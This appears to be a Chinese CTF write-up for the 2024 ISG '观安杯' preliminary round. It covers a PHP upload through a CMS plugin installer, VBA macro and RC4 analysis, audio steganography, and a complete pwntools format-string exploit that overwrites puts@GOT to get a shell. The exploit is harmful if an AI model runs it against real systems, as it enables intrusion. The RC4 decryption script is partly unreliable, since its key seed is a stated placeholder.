前言:感谢大佬观看,如果对你有帮助记得一键三连 附件回复“2024观安杯” 后台获取 文章同步CSDN ~

Web-emm:


使用设置好的管理员用户和密码 进行登录后台

然后点击插件

在本地创建目录test-test

然后在test目录里创建test.php

注意看一下压缩包的结构,一定要是一个目录里面包含php文件,不然就会报错显示安装失败,点击上传,上传完事以后,访问路径

isg.idss-cn.com:25554/content/plugins/test/test.php
Misc-office:
excl表格Base64解码得到密码,打开发现是假的
I#ziTxnxvbg#GC9

既然是office的题肯定想到 

使用工具oletool得到VB宏代码进行分析

olevba xxx.xlsm -p  ##密码

##提取Function Check(user_enc)    Encrypted = '184,116,232,38,216,127,29,89,225,84,108,82,8,0,161,49,232,127,45,252,147,140,185,210,26,107,123,2,82,189,0,167,205,130,94,54,94,242,138,139,102,79,250,139,9,142,17,42,198,113,246,6,142,31,'
    If (user_enc <> Encrypted) Then        Check = False    Else        Check = True    End IfEnd Function
Private Sub Worksheet_Change(ByVal Target As Range)    If Not Intersect(Target, Me.Range('B2')) Is Nothing Then        If Check(crypto(Target.Value)) Then            Me.Range('C2').Value = 'success'            Me.Range('C2').Interior.Color = RGB(232, 245, 233)        Else            Me.Range('C2').Value = 'fail'            Me.Range('C2').Interior.Color = RGB(251, 233, 231)        End If    End IfEnd Sub

Function crypto(sMessage)    Dim kLen, x, y, i, j, temp    Dim s(256)     For i = 0 To 255        s(i) = i    Next     j = 0    For i = 0 To 255        j = (j + s(i)) Mod 256        temp = s(i)        s(i) = s(j)        s(j) = temp    Next     x = 0    y = 0    For i = 1 To Len(sMessage)        x = (x + 1) Mod 256        y = (y + s(x)) Mod 256        temp = s(x)        s(x) = s(y)        s(y) = temp         crypto = crypto & (s((s(x) + s(y)) Mod 256) Xor Asc(Mid(sMessage, i, 1))) & ','    NextEnd Function
通过AI发现是RC4直接写脚本解密即可。
def initialize_key_schedule(seed): key_schedule = list(range(256)) # 初始化密钥调度表 j = 0 for i in range(256): j = (j + key_schedule[i]) % 256 key_schedule[i], key_schedule[j] = key_schedule[j], key_schedule[i] return key_schedule
2024年 ISG 网络安全技能竞赛“观安杯”管理运维赛初赛Writeup
def rc4_crypt(seed, data): key_schedule = initialize_key_schedule(seed) x = y = 0 encrypted_data = [] for byte in data: x = (x + 1) % 256 y = (y + key_schedule[x]) % 256 key_schedule[x], key_schedule[y] = key_schedule[y], key_schedule[x] t = key_schedule[(key_schedule[x] + key_schedule[y]) % 256] encrypted_data.append(chr(byte ^ t)) return ''.join(encrypted_data)
# 原始的加密数据encrypted_data = [184,116,232,38,216,127,29,89,225,84,108,82,8,0,161,49,232,127,45,252,147,140,185,210,26,107,123,2,82,189,0,167,205,130,94,54,94,242,138,139,102,79,250,139,9,142,17,42,198,113,246,6,142,31] # 省略了部分数据
# RC4密钥种子key_seed = [0] * len(encrypted_data) # 假设密钥种子与加密数据长度相同,这里仅作为示例
# 执行RC4解密decrypted_data = rc4_crypt(key_seed, encrypted_data)print(decrypted_data)

方法2:使用工具一样可以

Misc-see it:

音频文件binwalk -e 分离得到一个压缩包 里面有密码:p@ssw0rd_1s_myg0

得到密码可以想到使用steghide 解密

使用zsteg 得到flag 

steghide extract -sf challenge.wavzsteg mygo.png

pwn1-dollar:


输入存在$过滤

Printf输出时会进行排序,但是n可以绕过。

发现格式化字符串漏洞

直接手写利用payload getshell

exp:

from pwn import *
# p = remote('isg.idss-cn.com',29564)p = process('./pwn')libc = ELF('./libc.so.6')elf = ELF('./pwn')
def inpt(content): p.sendlineafter('e > ','1') p.sendlineafter('ge > ',content)
def printf(): p.sendlineafter('e > ', '2')
def puts(): p.sendlineafter('e > ', '3')
def pwn(): inpt('n'+'%d'*42+'.%p.') printf() p.recvuntil('.') libc.address = int(p.recvuntil('.')[:-1],16)-0x29d90 addr1 = (libc.symbols['system'] & 0xffff) - 0x21 addr2 = ((libc.symbols['system']>>16)&0xffff)-(libc.symbols['system']&0xffff) print('libc:',hex(libc.address)) snd = b'n'+b'%c'*0x20+b'%'+str(addr1).encode()+b'c%hn%'+str(addr2).encode()+b'c%hn' snd = snd.ljust((0x22-8)*8)+p64(elf.got['puts']) snd = snd.ljust((0x24-8)*8)+p64(elf.got['puts']+2) inpt(snd) printf() inpt('sh;') puts() p.interactive()
pwn()##flag{4DSmeHyBCZtF71VEPopsYvx5qa9UiGQu}
关注我们

点分享

点收藏

点在看